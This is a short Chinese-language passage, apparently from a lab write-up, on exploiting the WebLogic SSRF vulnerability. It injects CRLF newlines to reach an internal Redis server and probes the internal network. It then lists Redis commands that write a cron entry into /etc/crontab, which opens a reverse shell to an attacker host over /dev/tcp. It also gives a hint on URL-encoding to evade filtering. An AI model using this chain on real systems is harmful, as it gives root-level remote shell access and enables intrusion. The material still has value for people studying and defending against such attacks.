如果访问的非http协议,则会返回did not have a valid SOAP content-type。 注入HTTP头,利用Redis反弹shell
(1)Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。
(2)通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*)。Setup UDDI Explorer这个页面泄露了内网的网段,可以用burpsuite或者脚本来探测。这里由于是在本机上搭建的漏洞环境,因此显示的是localhost。实战中则会泄露真实内网IP。
redis默认开放的端口为6379,发现172.19.0.2:6379可以连通:
(3)发送三条redis命令,将反弹shell脚本写入/etc/crontab:
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.14.130/8899 0>&1\n\n\n\n"config set dir /etc/config set dbfilename crontabsaveURL编码,绕过拦截。